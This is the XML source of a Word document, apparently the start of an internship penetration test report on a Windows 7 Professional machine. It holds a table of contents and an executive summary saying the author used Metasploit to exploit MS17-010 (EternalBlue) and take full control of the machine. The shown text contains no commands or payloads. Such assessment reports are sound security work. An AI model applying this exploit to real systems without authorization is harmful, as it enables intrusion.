              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66CC8506" w14:textId="67A3A229" w:rsidR="00233899" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc175499461" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Test Scope and Method</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499461 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F182C9C" w14:textId="1095A61D" w:rsidR="00233899" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc175499462" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 Extent of Testing</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499462 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D742FD7" w14:textId="74BDDB3C" w:rsidR="00233899" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc175499463" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 Test Scope Summary</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499463 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D5C3CC6" w14:textId="1E2FABD2" w:rsidR="00233899" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc175499464" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Internal Phase</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499464 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76944088" w14:textId="17CC1547" w:rsidR="00233899" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc175499465" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Phase Summary</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499465 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="307CA1FC" w14:textId="703F6183" w:rsidR="00233899" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc175499466" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Actions Taken</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499466 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="385F0EB3" w14:textId="25C4631E" w:rsidR="00233899" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc175499467" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Results</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499467 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31C3ADD0" w14:textId="3B99C63C" w:rsidR="00233899" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc175499468" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. External Phase</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499468 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3AEFD4A9" w14:textId="75E824A5" w:rsidR="00233899" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc175499469" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. Conclusions</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499469 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DBE37E8" w14:textId="1275A6BD" w:rsidR="00233899" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8713"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc175499470" w:history="1">
            <w:r w:rsidR="00233899" w:rsidRPr="00003CD3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175499470 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00233899">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1645859F" w14:textId="257370F6" w:rsidR="00162FB3" w:rsidRPr="00162FB3" w:rsidRDefault="00162FB3">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00162FB3">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="06932CEF" w14:textId="5B49CAD9" w:rsidR="00B20E9C" w:rsidRPr="00DC3DEF" w:rsidRDefault="00B20E9C" w:rsidP="008872A2">
      <w:pPr>
        <w:spacing w:after="574" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="3" w:hanging="10"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572F7C1A" w14:textId="1DCBA2D6" w:rsidR="00B20E9C" w:rsidRDefault="00B20E9C">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="202" w:right="192" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="159247A3" w14:textId="77777777" w:rsidR="00162FB3" w:rsidRDefault="00162FB3">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="202" w:right="192" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206CDC3C" w14:textId="77777777" w:rsidR="006669DA" w:rsidRPr="00DC3DEF" w:rsidRDefault="006669DA" w:rsidP="006669DA">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:right="192"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="380379CF" w14:textId="6016D9EC" w:rsidR="007F4E0B" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc175499456"/>
      <w:r w:rsidRPr="007F4E0B">
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5BE0F4A9" w14:textId="0787F488" w:rsidR="007F4E0B" w:rsidRPr="00233899" w:rsidRDefault="007F4E0B" w:rsidP="00233899">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc175499457"/>
      <w:r w:rsidRPr="00233899">
        <w:t>1.1 Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="1046A878" w14:textId="5F67EE6A" w:rsidR="00364EFA" w:rsidRPr="00DC3DEF" w:rsidRDefault="00364EFA" w:rsidP="00364EFA">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As part of my Cyber Security internship at LearnNex, I, Sumit Kumar Das (skdas5405@gmail.com), conducted an independent penetration test on a Windows 7 Professional machine to assess its security controls. The objective was to identify and exploit vulnerabilities that could be leveraged in real-world attack scenarios, providing a clear understanding of the system's susceptibility to exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B9B8B9" w14:textId="77777777" w:rsidR="00364EFA" w:rsidRPr="00DC3DEF" w:rsidRDefault="00364EFA" w:rsidP="00364EFA">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The key vulnerability identified was the MS17-010 (EternalBlue) exploit, a critical flaw that allowed for remote code execution. Using the Metasploit Framework, I successfully exploited this vulnerability to gain full control over the machine, demonstrating the severe risk posed by unpatched systems. This finding emphasizes the importance of maintaining up-to-date patches and implementing robust security protocols to mitigate the potential for system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF03C5E" w14:textId="77777777" w:rsidR="00364EFA" w:rsidRPr="00DC3DEF" w:rsidRDefault="00364EFA" w:rsidP="00364EFA">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This assessment highlights the critical need for organizations to routinely assess legacy systems, ensuring that outdated vulnerabilities are addressed to prevent severe breaches and unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8EBF64" w14:textId="1FB53AF4" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="00233899">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc175499458"/>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00885809" w:rsidRPr="00DC3DEF">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t xml:space="preserve"> High-Level Test Outcomes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2B512AC8" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Successful exploitation of the MS17-010 vulnerability using Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E3111F" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Full system compromise, including remote code execution and the ability to escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1914C3A2" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>No other significant vulnerabilities were detected during the testing phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA1CA82" w14:textId="473EFFA0" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="00233899">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc175499459"/>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00885809" w:rsidRPr="00DC3DEF">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t xml:space="preserve"> Overall Risk Rating</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
